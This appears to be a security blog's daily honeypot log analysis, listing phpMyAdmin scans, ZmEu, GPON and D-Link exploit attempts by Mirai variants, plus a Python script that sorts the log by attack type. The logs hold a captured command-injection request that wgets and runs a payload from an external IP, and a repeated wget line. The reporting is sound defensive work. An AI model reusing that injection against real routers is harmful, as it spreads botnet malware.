S-Owl

S(ecurity)Owl

Quick analysis of WOWHoneypot (day 48)

This is a quick analysis of WOWHoneypot for 2018/07/21 (day 48 of operation).
Today's total access count is 153. The full access log follows.

35 2018-07-21 GET /
5 2018-07-21 GET /pma/scripts/setup.php
5 2018-07-21 GET /phpmyadmin/scripts/setup.php
5 2018-07-21 GET /myadmin/scripts/setup.php
4 2018-07-21 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
4 2018-07-21 GET /phpMyAdmin/scripts/setup.php
4 2018-07-21 GET /MyAdmin/scripts/setup.php
2 2018-07-21 POST /GponForm/diag_Form?images/
2 2018-07-21 GET /phpMyAdmin-2/scripts/setup.php
1 2018-07-21 HEAD /
1 2018-07-21 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-21 GET /xampp/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /.well-known/security.txt
1 2018-07-21 GET /websql/scripts/setup.php
1 2018-07-21 GET /web/scripts/setup.php
1 2018-07-21 GET /web/phpMyAdmin/scripts/setup.php
1 2018-07-21 GET /typo3/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /sitemap.xml
1 2018-07-21 GET /scripts/setup.php
1 2018-07-21 GET /robots.txt
1 2018-07-21 GET /php/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /php-my-admin/scripts/setup.php
1 2018-07-21 GET /_phpmyadmin/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.4.3.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.0.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.0.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.0-rc1-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.9/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.8/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.7/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.4/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.2.3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.7/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.9/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.0.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.2.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.0/scripts/setup.php
1 2018-07-21 GET /phpadmin/scripts/setup.php
1 2018-07-21 GET /mysql/scripts/setup.php
1 2018-07-21 GET /mysqladmin/scripts/setup.php
1 2018-07-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-21 GET hxxp://114.215.240[.]151:83/index.php
1 2018-07-21 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-21 GET /forum/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /favicon.ico
1 2018-07-21 GET /db/scripts/setup.php
1 2018-07-21 GET /dbadmin/scripts/setup.php
1 2018-07-21 GET /cpphpmyadmin/scripts/setup.php
1 2018-07-21 GET /cpanelphpmyadmin/scripts/setup.php
1 2018-07-21 GET /blog/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /apache-default/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /admin/scripts/setup.php
1 2018-07-21 GET /admin/pma/scripts/setup.php
1 2018-07-21 GET /admin/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php

Access counts excluding phpMyAdmin-related requests (103) and /.

4 2018-07-21 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 2018-07-21 POST /GponForm/diag_Form?images/
1 2018-07-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72.82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-21 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-21 GET hxxp://114.215.240.151:83/index.php
1 2018-07-21 GET hxxp://114.215.207.183:83/index.php
1 2018-07-21 GET /.well-known/security.txt
1 2018-07-21 GET /sitemap.xml
1 2018-07-21 GET /robots.txt
1 2018-07-21 GET /favicon.ico

Today ZmEu scanned for phpMyAdmin a total of four times. Three of the IPs made the same six accesses each, while one IP alone scanned a large number of paths.

Apart from that, we saw:
・Attacks by the Mirai variant Masuta targeting an arbitrary code execution vulnerability in consumer GPON routers
・Attacks by the Mirai variants Shinoa/Satori targeting a D-Link vulnerability
・Probing of XDebug, a tool for remotely debugging PHP
・Open-relay (proxy) probing
・Site structure reconnaissance
That is about it.
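The sorting done by hand above can be scripted. The following is an added example (not part of the original post or WOWHoneypot itself): it parses lines in the "count date method path" form shown above and tallies them into the same categories the post uses. The sample input is a constructed subset of the day's entries, defanged as on the page; the rule labels and path patterns are the author of this example's own choice.

```python
import re
from collections import Counter

# Constructed sample input: a subset of the day's entries quoted in the post (defanged as on the page).
SAMPLE_LOG = """\
35 2018-07-21 GET /
5 2018-07-21 GET /pma/scripts/setup.php
4 2018-07-21 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 2018-07-21 POST /GponForm/diag_Form?images/
1 2018-07-21 HEAD /
1 2018-07-21 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-21 GET hxxp://114.215.240[.]151:83/index.php
1 2018-07-21 GET /robots.txt
"""
LINE_RE = re.compile(r"^(\d+)\s+(\d{4}-\d{2}-\d{2})\s+(\S+)\s+(\S+)$")
RECON_PATHS = {"/", "/robots.txt", "/sitemap.xml", "/favicon.ico", "/.well-known/security.txt"}

# Ordered rules, first match wins; labels follow the categories the post uses (assumed patterns).
RULES = [
    ("phpMyAdmin setup.php scan", lambda p: p.endswith("/scripts/setup.php")),
    ("ZmEu scanner signature", lambda p: "w00tw00t" in p),
    ("GPON router exploit (Mirai variant)", lambda p: p.startswith("/GponForm/diag_Form")),
    ("D-Link login.cgi exploit (Mirai variant)", lambda p: p.startswith("/login.cgi?cli=")),
    ("XDebug remote-debug probe", lambda p: "XDEBUG_SESSION_START" in p),
    ("open-proxy relay check", lambda p: p.startswith(("http://", "https://", "hxxp://"))),
    ("site reconnaissance", lambda p: p in RECON_PATHS),
]

def classify(path):
    for label, test in RULES:
        if test(path):
            return label
    return "uncategorized"

def summarize(log_text):
    # Sum request counts per category; returns (total, Counter of category -> count).
    totals, total = Counter(), 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:                      # skip blank or malformed lines
            continue
        count, _date, _method, path = m.groups()
        totals[classify(path)] += int(count)
        total += int(count)
    return total, totals

if __name__ == "__main__":
    total, by_cat = summarize(SAMPLE_LOG)
    print(total, by_cat.most_common())
```

Anything that lands in "uncategorized" is the part worth reading by hand the next day.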


Today's hunting log is below. It comes from a Mirai variant.

1 2018-07-21 wget hxxp://104.244.72[.]82/k

That's all.